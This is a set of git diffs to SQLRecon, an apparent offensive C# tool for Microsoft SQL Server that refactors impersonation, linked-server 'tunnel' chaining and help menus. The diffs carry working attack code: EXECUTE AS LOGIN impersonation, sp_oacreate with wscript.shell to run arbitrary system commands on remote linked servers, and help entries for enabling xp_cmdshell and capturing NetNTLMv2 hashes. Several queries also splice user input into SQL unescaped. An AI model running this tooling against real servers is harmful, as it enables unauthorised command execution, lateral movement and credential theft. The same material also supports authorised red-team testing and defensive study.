+                                      $"INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id " +
+                                      $"WHERE a.permission_name = 'IMPERSONATE' AND b.name = '{impersonate.Replace("'", "''")}'";
+
+            SqlCommand impersonateCommand = new(impersonateQuery, con);
+            object impersonateResult = impersonateCommand.ExecuteScalar();
+
+            // If any result is returned, the user can be impersonated
+            return impersonateResult != null;
+        }
+
+
         /// <summary>
         /// The ExecuteImpersonationQuery method is used to execute
-        /// a query against a SQL server using impersonation. Error handling
-        /// is performed to ensure that the impersonated user exists before
-        /// executing the query.
-        /// This method expects that the output only returns one value
+        /// a query against a SQL server using impersonation. It first checks if the user has
+        /// the necessary permissions or is a sysadmin. Error handling
+        /// is performed to ensure that the impersonated user exists and can be impersonated
+        /// before executing the query. This method expects that the output only returns one value
         /// on a single line and does not account for multi-line returns.
         /// </summary>
-        /// <param name="con"></param>
-        /// <param name="impersonate"></param>
-        /// <param name="query"></param>
-        /// <returns></returns>
+        /// <param name="con">The SQL connection.</param>
+        /// <param name="impersonate">The user to impersonate.</param>
+        /// <param name="query">The SQL query to execute.</param>
+        /// <returns>The query result or an error message.</returns>
         public string ExecuteImpersonationQuery(SqlConnection con, string impersonate, string query)
         {
-            string sqlString = ExecuteCustomQuery(con,
-                "SELECT distinct b.name FROM sys.server_permissions a " +
-                "INNER JOIN sys.server_principals b ON a.grantor_principal_id " +
-                "= b.principal_id WHERE a.permission_name = 'IMPERSONATE';");
-
-            // Check to see if the supplied user can be impersonated.
-            if (sqlString.ToLower().Contains(impersonate.ToLower()))
+            // Use the CanImpersonate method to check if the current user can impersonate the specified user.
+            if (CanImpersonate(con, impersonate))
             {
-                // Prepend the query with EXECUTE AS LOGIN and the impersonated user.
-                sqlString = ExecuteQuery(con,
-                    "EXECUTE AS LOGIN = '" + impersonate + "';" + query);
+                // Construct and execute the query with impersonation.
+                string impersonationQuery = $"EXECUTE AS LOGIN = '{impersonate}'; {query}; REVERT;";
+                string result = ExecuteQuery(con, impersonationQuery);
 
-                return (sqlString.ToLower().Contains("cannot execute as the server principal"))
-                    ? _print.Error(string.Format("The {0} login can not be impersonated.", impersonate))
-                    : sqlString;
+                return result.ToLower().Contains("cannot execute as the server principal")
+                    ? _print.Error($"The {impersonate} login cannot be impersonated.")
+                    : result;
             }
             else
             {
-                // Go no further
-                return _print.Error(string.Format("The {0} login can not be impersonated.", impersonate));
+                // The user cannot be impersonated or the current user does not have sufficient privileges.
+                return _print.Error($"The {impersonate} login cannot be impersonated or you do not have sufficient privileges.");
             }
         }
 
         /// <summary>
-        /// The ExecuteCustomImpersonationQuery method is used to execute
-        /// a query against a SQL server using impersonation. Error handling
-        /// is performed to ensure that the impersonated user exists before
-        /// executing the query.
-        /// This method expects that the output returns multiple lines.
+        /// Attempts to impersonate a specified user within the context of a given SQL connection.
+        /// This method checks if the current connected user can impersonate the specified user and,
+        /// if permitted, executes the impersonation. It provides feedback on the success or failure
+        /// of the impersonation attempt.
         /// </summary>
-        /// <param name="con"></param>
-        /// <param name="impersonate"></param>
-        /// <param name="query"></param>
-        /// <returns></returns>
-        public string ExecuteImpersonationCustomQuery(SqlConnection con, string impersonate, string query)
+        /// <param name="con">The active SQL connection over which the impersonation attempt will be made.</param>
+        /// <param name="impersonate">The username of the account to impersonate. This should be a valid
+        /// SQL Server login. If the impersonation is successful, subsequent queries will be executed
+        /// under the context of this user.</param>
+        /// <remarks>
+        /// This method first checks if the current user has the necessary permissions to impersonate
+        /// another user using the CanImpersonate method. If the impersonation is possible, it executes
+        /// the impersonation command. After attempting to impersonate, it queries the current system
+        /// and database user context to confirm the impersonation status and provides appropriate
+        /// feedback.
+        ///
+        /// If impersonation is not possible (due to insufficient permissions or an invalid username),
+        /// an error message is displayed, and the connection's context remains unchanged.
+        /// </remarks>
+        public void Impersonate(SqlConnection con, string impersonate = null)
         {
-            string sqlString = ExecuteCustomQuery(con,
-                "SELECT distinct b.name FROM sys.server_permissions a " +
-                "INNER JOIN sys.server_principals b ON a.grantor_principal_id " +
-                "= b.principal_id WHERE a.permission_name = 'IMPERSONATE';");
-
-            // Check to see if the supplied user can be impersonated.
-            if (sqlString.ToLower().Contains(impersonate.ToLower()))
+            _print.Status($"Trying to impersonate '{impersonate}'", true);
+            // Use the CanImpersonate method to check if the current user can impersonate the specified user.
+            if (CanImpersonate(con, impersonate))
             {
-                // Prepend the query with EXECUTE AS LOGIN and the impersonated user.
-                sqlString =  ExecuteCustomQuery(con, 
-                    "EXECUTE AS LOGIN = '" + impersonate + "';" + query);
+                // Construct and execute the query with impersonation.
+                string impersonationQuery = $"EXECUTE AS LOGIN = '{impersonate}';";
+                string result = ExecuteQuery(con, impersonationQuery);
 
-                return (sqlString.ToLower().Contains("cannot execute as the server principal"))
-                    ? _print.Error(string.Format("The {0} login can not be impersonated.", impersonate))
-                    : sqlString;
+                if (result.ToLower().Contains("cannot execute as the server principal"))
+                {
+                    _print.Error("Cannot be impersonated.", true);
+                }
+                else
+                {
+                    _print.Success($"Impersonated server user '{ExecuteQuery(con, "SELECT SYSTEM_USER;")}'", true);
+                    _print.Success($"Mapped to the username '{ExecuteQuery(con, "SELECT USER_NAME();")}'", true);
+                }
             }
             else
             {
-                // Go no further
-                return _print.Error(string.Format("The {0} login can not be impersonated.", impersonate));
+                _print.Error($"The {impersonate} login cannot be impersonated or you do not have sufficient privileges.", true);
             }
         }
+
+
+        /// <summary>
+        /// The ExecuteImpersonationCustomQuery method is used to execute
+        /// a query against a SQL server using impersonation. Error handling
+        /// is performed to ensure that the impersonated user exists before
+        /// executing the query. This method expects that the output returns multiple lines.
+        /// </summary>
+        /// <param name="con">The SQL connection.</param>
+        /// <param name="impersonate">The user to impersonate.</param>
+        /// <param name="query">The SQL query to execute.</param>
+        /// <returns>The query result or an error message.</returns>
+        public string ExecuteImpersonationCustomQuery(SqlConnection con, string impersonate, string query)
+        {
+            // Use the CanImpersonate method to check if the current user can impersonate the specified user.
+            if (CanImpersonate(con, impersonate))
+            {
+                // If the user can be impersonated, construct and execute the query with impersonation.
+                string impersonationQuery = $"EXECUTE AS LOGIN = '{impersonate}'; {query}; REVERT;";
+                return ExecuteCustomQuery(con, impersonationQuery);
+            }
+            else
+            {
+                // If the user cannot be impersonated, return an error.
+                return _print.Error($"The {impersonate} login cannot be impersonated or you do not have sufficient privileges.");
+            }
+        }
+
 
         /// <summary>
         /// The ExecuteLinkedQuery method is used to execute a query against a 
@@ -330,6 +413,8 @@ namespace SQLRecon.Modules
             }
             return sqlString;
         }
+
+
 
         /// <summary>
         /// The ExecuteLinkedCustomQueryRpcExec method is used to execute a

--- a/SQLRecon/SQLRecon/modules/GetDomainSPNs.cs
+++ b/SQLRecon/SQLRecon/modules/GetDomainSPNs.cs
@@ -2,6 +2,7 @@ using System;
 using System.Collections.Generic;
 using System.Security.Principal;
 using SQLRecon.Utilities;
+using System.Net;
 
 namespace SQLRecon.Modules
 {
@@ -52,6 +53,8 @@ namespace SQLRecon.Modules
                         : instance.Substring(0, i2);
 
                     sqlInstance.ComputerName = computerName;
+                    var addresses = Dns.GetHostAddresses(computerName);
+                    sqlInstance.IpAddress = addresses.Length > 0 ? addresses[0].ToString() : "No IP found";
                     sqlInstance.Instance = instance;
                     sqlInstance.ServiceName = serviceName;
                     sqlInstance.Spn = spn;
@@ -75,6 +78,7 @@ namespace SQLRecon.Modules
         private sealed class SqlInstance
         {
             public string ComputerName { get; set; }
+            public string IpAddress { get; set; }
             public string Instance { get; set; }
             public string AccountSid { get; set; }
             public string AccountName { get; set; }
@@ -87,6 +91,7 @@ namespace SQLRecon.Modules
             {
                 Console.WriteLine("");
                 _print.Nested(string.Format("ComputerName:  {0}", ComputerName), true);
+                _print.Nested(string.Format("IP Address:    {0}", IpAddress), true);
                 _print.Nested(string.Format("Instance:      {0}", Instance), true);
                 _print.Nested(string.Format("AccountSid:    {0}", AccountSid), true);
                 _print.Nested(string.Format("AccountName:   {0}", AccountName), true);

--- a/SQLRecon/SQLRecon/modules/OLECmdExec.cs
+++ b/SQLRecon/SQLRecon/modules/OLECmdExec.cs
@@ -29,7 +29,7 @@ namespace SQLRecon.Modules
             }
 
             // Generate a new random output and program name.
-            string output = _rs.Generate(8); 
+            string output = _rs.Generate(8);
             string program = _rs.Generate(8);
 
             _print.Status(string.Format("Setting sp_oacreate to '{0}'.", output), true);
@@ -45,22 +45,23 @@ namespace SQLRecon.Modules
             _printStatus(output, program, sqlOutput);
         }
 
+
         /// <summary>
-        /// The Impersonate method will create a OLE object on a remote SQL
-        /// server and use wscript.shell to execute an arbitrary command using
-        /// impersonation.
+        /// The Tunnel method will create an OLE object on a remote tunneled SQL
+        /// server and use wscript.shell to execute an arbitrary command.
         /// </summary>
         /// <param name="con"></param>
         /// <param name="cmd"></param>
-        /// <param name="impersonate"></param>
-        public void Impersonate(SqlConnection con, string cmd, string impersonate = "null")
+        /// <param name="tunnelSqlServers"></param>
+        public void Tunnel(SqlConnection con, string cmd, string[] tunnelSqlServers, string sqlServer)
         {
             // First check to see if ole automation procedures is enabled.
-            string sqlOutput = _config.ModuleStatus(con, "Ole Automation Procedures", impersonate);
+            string sqlOutput = _config.TunnelModuleStatus(con, "Ole Automation Procedures", tunnelSqlServers);
+
             if (!sqlOutput.Contains("1"))
             {
-                _print.Error("You need to enable OLE Automation Procedures (ienableole).", true);
-                // Go no futher.
+                _print.Error("You need to enable OLE Automation Procedures (enableole).", true);
+                // Go no further.
                 return;
             }
 
@@ -68,58 +69,22 @@ namespace SQLRecon.Modules
             string output = _rs.Generate(8);
             string program = _rs.Generate(8);
 
-            _print.Status(string.Format("Setting sp_oacreate to '{0}'.", output), true);
-            _print.Status(string.Format("Setting sp_oamethod to '{0}'.", program), true);
+            _print.Status($"Setting sp_oacreate to '{output}'.", true);
+            _print.Status($"Setting sp_oamethod to '{program}'.", true);
 
-            sqlOutput = _sqlQuery.ExecuteImpersonationQuery(con, impersonate, 
-                "DECLARE @" + output + " INT; " +
-                "DECLARE @" + program + " VARCHAR(255);" +
-                "SET @" + program + " = 'Run(\"" + cmd + "\")';" +
-                "EXEC sp_oacreate 'wscript.shell', @" + output + " out;" +
-                "EXEC sp_oamethod @" + output + ", @" + program + ";" +
-                "EXEC sp_oadestroy @" + output + ";");
-
-            _printStatus(output, program, sqlOutput);
-        }
-
-        /// <summary>
-        /// The Linked method will create a OLE object on a remote linked SQL
-        /// server and use wscript.shell to execute an arbitrary command.
-        /// <param name="con"></param>
-        /// <param name="cmd"></param>
-        /// <param name="linkedSqlServer"></param>
-        public void Linked(SqlConnection con, string cmd, string linkedSqlServer)
-        {
-            // First check to see if ole automation procedures is enabled.
-            string sqlOutput = _config.LinkedModuleStatus(con, "Ole Automation Procedures", linkedSqlServer);
-
-            if (!sqlOutput.Contains("1"))
-            {
-                _print.Error("You need to enable OLE Automation Procedures (lenableole).", true);
-                // Go no futher.
-                return;
-            }
-
-            // Generate a new random output and program name.
-            string output = _rs.Generate(8);
-            string program = _rs.Generate(8);
-
-            _print.Status(string.Format("Setting sp_oacreate to '{0}'.", output), true);
-            _print.Status(string.Format("Setting sp_oamethod to '{0}'.", program), true);
-
-            sqlOutput = _sqlQuery.ExecuteLinkedCustomQuery(con, linkedSqlServer, "select 1; " +
-                "DECLARE @" + output + " INT; " +
-                "DECLARE @" + program + " VARCHAR(255);" +
-                "SET @" + program + " = ''Run(\"" + cmd + "\")'';" +
-                "EXEC sp_oacreate ''wscript.shell'', @" + output + " out;" +
-                "EXEC sp_oamethod @" + output + ", @" + program + ";" +
-                "EXEC sp_oadestroy @" + output + ";");
+            sqlOutput = _sqlQuery.ExecuteTunnelCustomQuery(con, tunnelSqlServers, $"DECLARE @{output} INT; " +
+                $"DECLARE @{program} VARCHAR(255);" +
+                $"SET @{program} = ''Run(\"{cmd}\")'';" +
+                $"EXEC sp_oacreate ''wscript.shell'', @{output} out;" +
+                $"EXEC sp_oamethod @{output}, @{program};" +
+                $"EXEC sp_oadestroy @{output};");
 
             _printStatus(output, program, sqlOutput);
         }
 
+
         /// <summary>
-        /// The _printStatus method will display the status of the 
+        /// The _printStatus method will display the status of the
         /// OLE command execution.
         /// </summary>
         /// <param name="output"></param>

--- a/SQLRecon/SQLRecon/modules/Roles.cs
+++ b/SQLRecon/SQLRecon/modules/Roles.cs
@@ -17,7 +17,7 @@ namespace SQLRecon.Modules
         /// <returns></returns>
         public bool CheckServerRole(SqlConnection con, string role, bool print = false)
         {
-            var sqlOutput = _sqlQuery.ExecuteQuery(con, 
+            var sqlOutput = _sqlQuery.ExecuteQuery(con,
                 "SELECT IS_SRVROLEMEMBER('" + role + "');").TrimStart('\n');
 
             if (print)
@@ -25,6 +25,25 @@ namespace SQLRecon.Modules
 
             return sqlOutput.Equals("1");
         }
+
+        /// <summary>
+        /// The CheckTunnelServerRole method checks if a user is part of a role on a chain of linked SQL server.
+        /// </summary>
+        /// <param name="con"></param>
+        /// <param name="role"></param>
+        /// <param name="print"></param>
+        /// <returns></returns>
+        public bool CheckTunnelServerRole(SqlConnection con, string role, string[] tunnelSQLServer, bool print = false)
+        {
+            var sqlOutput = _sqlQuery.ExecuteTunnelQuery(con, tunnelSQLServer,
+                "SELECT IS_SRVROLEMEMBER('" + role + "');").TrimStart('\n');
+
+            if (print)
+                _roleResult(role, sqlOutput);
+
+            return sqlOutput.Equals("1");
+        }
+
 
         /// <summary>
         /// The CheckLinkedServerRole method checks if a user is part of a role on a linked SQL server.
@@ -63,6 +82,7 @@ namespace SQLRecon.Modules
 
             return sqlOutput.Equals("1");
         }
+
 
         /// <summary>
         /// The _roleResult method prints if a user is part of a role or not.

--- a/SQLRecon/SQLRecon/modules/Roles.cs
+++ b/SQLRecon/SQLRecon/modules/Roles.cs
@@ -44,46 +44,6 @@ namespace SQLRecon.Modules
             return sqlOutput.Equals("1");
         }
 
-
-        /// <summary>
-        /// The CheckLinkedServerRole method checks if a user is part of a role on a linked SQL server.
-        /// </summary>
-        /// <param name="con"></param>
-        /// <param name="role"></param>
-        /// <param name="linkedSQLServer"></param>
-        /// <param name="print"></param>
-        /// <returns></returns>
-        public bool CheckLinkedServerRole(SqlConnection con, string role, string linkedSQLServer, bool print = false)
-        {
-            var sqlOutput = _sqlQuery.ExecuteQuery(con, "select * from openquery(\"" + linkedSQLServer + "\", " +
-                "'SELECT IS_SRVROLEMEMBER(''" + role + "'');')").TrimStart('\n');
-
-            if (print)
-                _roleResult(role, sqlOutput);
-
-            return sqlOutput.Equals("1");
-        }
-
-        /// <summary>
-        /// The CheckImpersonatedRole method checks the roles of an impersonated user.
-        /// </summary>
-        /// <param name="con"></param>
-        /// <param name="role"></param>
-        /// <param name="impersonate"></param>
-        /// <param name="print"></param>
-        /// <returns></returns>
-        public bool CheckImpersonatedRole(SqlConnection con, string role, string impersonate, bool print = false)
-        {
-            var sqlOutput = _sqlQuery.ExecuteImpersonationQuery(con, impersonate,
-                "SELECT IS_SRVROLEMEMBER('" + role + "');").TrimStart('\n');
-
-            if (print)
-                _roleResult(role, sqlOutput);
-
-            return sqlOutput.Equals("1");
-        }
-
-
         /// <summary>
         /// The _roleResult method prints if a user is part of a role or not.
         /// </summary>

--- a/SQLRecon/SQLRecon/utilities/ArgumentLogic.cs
+++ b/SQLRecon/SQLRecon/utilities/ArgumentLogic.cs
@@ -107,10 +107,10 @@ namespace SQLRecon.Utilities
                 _gV.Impersonate = argDict["iuser"];
             }
 
-            if (argDict.ContainsKey("tunnel"))
+            if (argDict.ContainsKey("link"))
             {
                 // Get the tunnel chain, checking both possible keys.
-                string tunnelChain = argDict.ContainsKey("tunnel") ? argDict["tunnel"] : argDict["t"];
+                string tunnelChain = argDict.ContainsKey("link") ? argDict["link"] : argDict["l"];
 
 
                 // Split the tunnel chain into an array of server names.
@@ -124,17 +124,17 @@ namespace SQLRecon.Utilities
                 }
 
                 _gV.TunnelPath = string.Join(" -> ", serverChain);
-                _print.Status($"Setting tunnel path: {_gV.TunnelPath}", true);
+                _print.Status($"Setting link path: {_gV.TunnelPath}", true);
 
                 if (serverChain.Length == 0)
                 {
-                    _print.Error("Invalid tunnel SQL server chain provided.", true);
+                    _print.Error("Invalid link SQL server chain provided.", true);
                     // Go no further.
                     return;
                 }
 
                 _gV.Module = argDict["module"].ToLower();
-                _gV.TunnelSqlServer = serverChain;  // Assign the array to the global variable.
+                _gV.LinkChain = serverChain;  // Assign the array to the global variable.
             }
 
             if (_standardArgumentsAndOptionCount.TryGetValue(moduleName, out int standardArgumentCount))

--- a/SQLRecon/SQLRecon/utilities/Help.cs
+++ b/SQLRecon/SQLRecon/utilities/Help.cs
@@ -118,6 +118,18 @@ namespace SQLRecon.Utilities
 
             Console.WriteLine("");
             Console.WriteLine("------------------------------------------------------------------------------------------");
+            Console.WriteLine("\tTunnel Modules (/m:, /module:) are executed on a chain of linked SQL server (/t:, /tunnel:):");
+            Console.WriteLine("------------------------------------------------------------------------------------------");
+
+            table = new TablePrinter("", "", "");
+            table.AddRow("\ttQuery /t:SQL01,SQL02,SQL03 /c:QUERY", "|", "Execute a SQL query");
+            table.AddRow("\ttWhoami /t:SQL01,SQL02,SQL03", "|", "Display what user you are logged in as, mapped as and what roles exist");
+            table.AddRow("\ttUsers /t:SQL01,SQL02,SQL03", "|", "Display what user accounts and groups can authenticate against the database");
+            table.AddRow("\ttImpersonate", "|", "Enumerate user accounts that can be impersonated at the end of the tunnel");
+            table.Print();
+
+            Console.WriteLine("");
+            Console.WriteLine("------------------------------------------------------------------------------------------");
             Console.WriteLine("\tLinked Modules (/m:, /module:) are executed on a linked SQL server (/l:, /lhost:):");
             Console.WriteLine("------------------------------------------------------------------------------------------");
 

--- a/SQLRecon/SQLRecon/utilities/Help.cs
+++ b/SQLRecon/SQLRecon/utilities/Help.cs
@@ -21,9 +21,9 @@ namespace SQLRecon.Utilities
             Console.WriteLine("Modules starting with '[*]' require sysadmin role or a similar privileged context");
 
             Console.WriteLine("");
-            Console.WriteLine("----------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("---------------------------------------------------------------------------------------");
             Console.WriteLine("\tEnumeration Modules (/e:, /enum:) do not require authentication to be supplied");
-            Console.WriteLine("----------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("---------------------------------------------------------------------------------------");
 
             Console.WriteLine("SqlSpns - Use the current user token to enumerate the current AD domain for MSSQL SPNs");
             var table = new TablePrinter("", "", "");
@@ -31,9 +31,9 @@ namespace SQLRecon.Utilities
             table.Print();
 
             Console.WriteLine("");
-            Console.WriteLine("---------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("--------------------------------------------------------------------------------------");
             Console.WriteLine("\tAuthentication Providers (/a:, /auth:) set the SQL server authentication type");
-            Console.WriteLine("---------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("--------------------------------------------------------------------------------------");
 
             Console.WriteLine("WinToken - Use the current users token to authenticate against the SQL database");
             table = new TablePrinter("", "", "");
@@ -84,25 +84,25 @@ namespace SQLRecon.Utilities
             table.Print();
 
             Console.WriteLine("");
-            Console.WriteLine("-------------------------------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("----------------------------------------------------------------------------------------------------");
             Console.WriteLine("\tImpersonation (/i:, /iuser:) set the server user to impersonate on the first MS SQL instance");
-            Console.WriteLine("-------------------------------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("----------------------------------------------------------------------------------------------------");
             table = new TablePrinter("", "", "");
             table.AddRow("\t/i:, /iuser:webapp01", "|", "Impersonate the server user 'webapp01' on /host MS SQL instance.");
             table.Print();
 
             Console.WriteLine("");
-            Console.WriteLine("---------------------------------------------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("--------------------------------------------------------------");
             Console.WriteLine("\tExecuting Commands Across Linked Servers (/l:, /link:)");
-            Console.WriteLine("---------------------------------------------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("--------------------------------------------------------------");
             table = new TablePrinter("", "", "");
             table.AddRow("\t/l:, /link:SQL02,SQL03,SQL05", "|", "This sets up a tunnel through SQL02 to SQL05, where the final command is executed.");
             table.Print();
 
             Console.WriteLine("");
-            Console.WriteLine("-------------------------------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("------------------------------------------------------------------------------------------------");
             Console.WriteLine("\tModules (/m:, /module:) available for a single instance of SQL server or linked servers:");
-            Console.WriteLine("-------------------------------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("------------------------------------------------------------------------------------------------");
 
             table = new TablePrinter("", "", "");
             table.AddRow("\tInfo", "|", "Show information about the SQL server");
@@ -135,9 +135,9 @@ namespace SQLRecon.Utilities
             table.Print();
 
             Console.WriteLine("");
-            Console.WriteLine("------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("-----------------------------------------------------------------------------");
             Console.WriteLine("\tSCCM Modules (/m:, /module:) execute SCCM database-specific commands:");
-            Console.WriteLine("------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("-----------------------------------------------------------------------------");
 
             table = new TablePrinter("", "", "");
             table.AddRow("\tsDatabases", "|", "Display all SCCM databases");

--- a/SQLRecon/SQLRecon/utilities/Help.cs
+++ b/SQLRecon/SQLRecon/utilities/Help.cs
@@ -85,7 +85,7 @@ namespace SQLRecon.Utilities
             Console.WriteLine("----------------------------------------------------------------------------------------------");
             Console.WriteLine("\tStandard Modules (/m:, /module:) are executed against a single instance of SQL server:");
             Console.WriteLine("----------------------------------------------------------------------------------------------");
-            
+
             table = new TablePrinter("", "", "");
             table.AddRow("\tInfo", "|", "Show information about the SQL server");
             table.AddRow("\tQuery /c:QUERY", "|", "Execute a SQL query");
@@ -120,7 +120,7 @@ namespace SQLRecon.Utilities
             Console.WriteLine("------------------------------------------------------------------------------------------");
             Console.WriteLine("\tLinked Modules (/m:, /module:) are executed on a linked SQL server (/l:, /lhost:):");
             Console.WriteLine("------------------------------------------------------------------------------------------");
-            
+
             table = new TablePrinter("", "", "");
             table.AddRow("\tlQuery /l:LINKED_HOST /c:QUERY", "|", "Execute a SQL query");
             table.AddRow("\tlWhoami /l:LINKED_HOST", "|", "Display what user you are logged in as, mapped as and what roles exist");
@@ -131,6 +131,7 @@ namespace SQLRecon.Utilities
             table.AddRow("\tlRows /l:LINKED_HOST /db:DATABASE /table:TABLE", "|", "Display the number of rows in the supplied database and table");
             table.AddRow("\tlSearch /l:LINKED_HOST /db:DATABASE /keyword:KEYWORD", "|", "Search column names in the supplied table of the database you are connected to");
             table.AddRow("\tlSmb /l:LINKED_HOST /rhost:UNC_PATH", "|", "Capture NetNTLMv2 hash");
+            table.AddRow("\tlImpersonate", "|", "Enumerate user accounts that can be impersonated on a linked SQL server");
             table.AddRow("\tlLinks /l:LINKED_HOST", "|", "Enumerate linked SQL servers on a linked SQL server");
             table.AddRow("\tlCheckRpc /l:LINKED_HOST", "|", "Obtain a list of linked servers on the linked server and their RPC status");
             table.AddRow("\t[*] lEnableXp /l:LINKED_HOST", "|", "Enable xp_cmdshell");
@@ -151,7 +152,7 @@ namespace SQLRecon.Utilities
             Console.WriteLine("--------------------------------------------------------------------------------------------------------------------------------------");
             Console.WriteLine("\tImpersonation Modules (/m:, /module:) are executed against a single instance of SQL server using impersonation (/i:, /iuser:):");
             Console.WriteLine("--------------------------------------------------------------------------------------------------------------------------------------");
-            
+
             table = new TablePrinter("", "", "");
             table.AddRow("\tiQuery /i:IMPERSONATE_USER /c:QUERY", "|", "Execute a SQL query");
             table.AddRow("\tiWhoami /i:IMPERSONATE_USER", "|", "Display what user you are logged in as, mapped as and what roles exist");

--- a/SQLRecon/SQLRecon/utilities/Help.cs
+++ b/SQLRecon/SQLRecon/utilities/Help.cs
@@ -6,7 +6,9 @@ namespace SQLRecon.Utilities
     {
 
         /// <summary>
-        /// The Help constructor prints the help menu to console.
+        /// The Help constructor prints the help menu to the console.
+        /// This includes details on how to use each module, the required and optional parameters,
+        /// and specific notes on features like impersonation and executing commands across linked servers.
         /// </summary>
         public Help()
         {
@@ -19,9 +21,9 @@ namespace SQLRecon.Utilities
             Console.WriteLine("Modules starting with '[*]' require sysadmin role or a similar privileged context");
 
             Console.WriteLine("");
-            Console.WriteLine("---------------------------------------------------------------------------------------");
-            Console.WriteLine("\tEnumeration Modules (/e:, /enum:) do not require authentication to be supplied:");
-            Console.WriteLine("---------------------------------------------------------------------------------------");
+            Console.WriteLine("----------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("\tEnumeration Modules (/e:, /enum:) do not require authentication to be supplied");
+            Console.WriteLine("----------------------------------------------------------------------------------------------------------------------");
 
             Console.WriteLine("SqlSpns - Use the current user token to enumerate the current AD domain for MSSQL SPNs");
             var table = new TablePrinter("", "", "");
@@ -29,9 +31,9 @@ namespace SQLRecon.Utilities
             table.Print();
 
             Console.WriteLine("");
-            Console.WriteLine("--------------------------------------------------------------------------------------");
-            Console.WriteLine("\tAuthentication Providers (/a:, /auth:) set the SQL server authentication type:");
-            Console.WriteLine("--------------------------------------------------------------------------------------");
+            Console.WriteLine("---------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("\tAuthentication Providers (/a:, /auth:) set the SQL server authentication type");
+            Console.WriteLine("---------------------------------------------------------------------------------------------------------------------");
 
             Console.WriteLine("WinToken - Use the current users token to authenticate against the SQL database");
             table = new TablePrinter("", "", "");
@@ -82,9 +84,25 @@ namespace SQLRecon.Utilities
             table.Print();
 
             Console.WriteLine("");
-            Console.WriteLine("----------------------------------------------------------------------------------------------");
-            Console.WriteLine("\tStandard Modules (/m:, /module:) are executed against a single instance of SQL server:");
-            Console.WriteLine("----------------------------------------------------------------------------------------------");
+            Console.WriteLine("-------------------------------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("\tImpersonation (/i:, /iuser:) set the server user to impersonate on the first MS SQL instance");
+            Console.WriteLine("-------------------------------------------------------------------------------------------------------------------------------------------");
+            table = new TablePrinter("", "", "");
+            table.AddRow("\t/i:, /iuser:webapp01", "|", "Impersonate the server user 'webapp01' on /host MS SQL instance.");
+            table.Print();
+
+            Console.WriteLine("");
+            Console.WriteLine("---------------------------------------------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("\tExecuting Commands Across Linked Servers (/l:, /link:)");
+            Console.WriteLine("---------------------------------------------------------------------------------------------------------------------------------------------------------");
+            table = new TablePrinter("", "", "");
+            table.AddRow("\t/l:, /link:SQL02,SQL03,SQL05", "|", "This sets up a tunnel through SQL02 to SQL05, where the final command is executed.");
+            table.Print();
+
+            Console.WriteLine("");
+            Console.WriteLine("-------------------------------------------------------------------------------------------------------------------------------------------");
+            Console.WriteLine("\tModules (/m:, /module:) available for a single instance of SQL server or linked servers:");
+            Console.WriteLine("-------------------------------------------------------------------------------------------------------------------------------------------");
 
             table = new TablePrinter("", "", "");
             table.AddRow("\tInfo", "|", "Show information about the SQL server");
@@ -117,85 +135,9 @@ namespace SQLRecon.Utilities
             table.Print();
 
             Console.WriteLine("");
-            Console.WriteLine("------------------------------------------------------------------------------------------");
-            Console.WriteLine("\tTunnel Modules (/m:, /module:) are executed on a chain of linked SQL server (/t:, /tunnel:):");
-            Console.WriteLine("------------------------------------------------------------------------------------------");
-
-            table = new TablePrinter("", "", "");
-            table.AddRow("\ttQuery /t:SQL01,SQL02,SQL03 /c:QUERY", "|", "Execute a SQL query");
-            table.AddRow("\ttWhoami /t:SQL01,SQL02,SQL03", "|", "Display what user you are logged in as, mapped as and what roles exist");
-            table.AddRow("\ttUsers /t:SQL01,SQL02,SQL03", "|", "Display what user accounts and groups can authenticate against the database");
-            table.AddRow("\ttImpersonate", "|", "Enumerate user accounts that can be impersonated at the end of the tunnel");
-            table.Print();
-
-            Console.WriteLine("");
-            Console.WriteLine("------------------------------------------------------------------------------------------");
-            Console.WriteLine("\tLinked Modules (/m:, /module:) are executed on a linked SQL server (/l:, /lhost:):");
-            Console.WriteLine("------------------------------------------------------------------------------------------");
-
-            table = new TablePrinter("", "", "");
-            table.AddRow("\tlQuery /l:LINKED_HOST /c:QUERY", "|", "Execute a SQL query");
-            table.AddRow("\tlWhoami /l:LINKED_HOST", "|", "Display what user you are logged in as, mapped as and what roles exist");
-            table.AddRow("\tlUsers /l:LINKED_HOST", "|", "Display what user accounts and groups can authenticate against the database");
-            table.AddRow("\tlDatabases /l:LINKED_HOST", "|", "Display all databases");
-            table.AddRow("\tlTables /l:LINKED_HOST /db:DATABASE", "|", "Display all tables in the supplied database");
-            table.AddRow("\tlColumns /l:LINKED_HOST /db:DATABASE /table:TABLE", "|", "Display all columns in the supplied database and table");
-            table.AddRow("\tlRows /l:LINKED_HOST /db:DATABASE /table:TABLE", "|", "Display the number of rows in the supplied database and table");
-            table.AddRow("\tlSearch /l:LINKED_HOST /db:DATABASE /keyword:KEYWORD", "|", "Search column names in the supplied table of the database you are connected to");
-            table.AddRow("\tlSmb /l:LINKED_HOST /rhost:UNC_PATH", "|", "Capture NetNTLMv2 hash");
-            table.AddRow("\tlImpersonate", "|", "Enumerate user accounts that can be impersonated on a linked SQL server");
-            table.AddRow("\tlLinks /l:LINKED_HOST", "|", "Enumerate linked SQL servers on a linked SQL server");
-            table.AddRow("\tlCheckRpc /l:LINKED_HOST", "|", "Obtain a list of linked servers on the linked server and their RPC status");
-            table.AddRow("\t[*] lEnableXp /l:LINKED_HOST", "|", "Enable xp_cmdshell");
-            table.AddRow("\t[*] lDisableXp /l:LINKED_HOST", "|", "Disable xp_cmdshell");
-            table.AddRow("\t[*] lXpCmd /l:LINKED_HOST /c:COMMAND", "|", "Execute a system command using xp_cmdshell");
-            table.AddRow("\t[*] lEnableOle /l:LINKED_HOST", "|", "Enable OLE automation procedures");
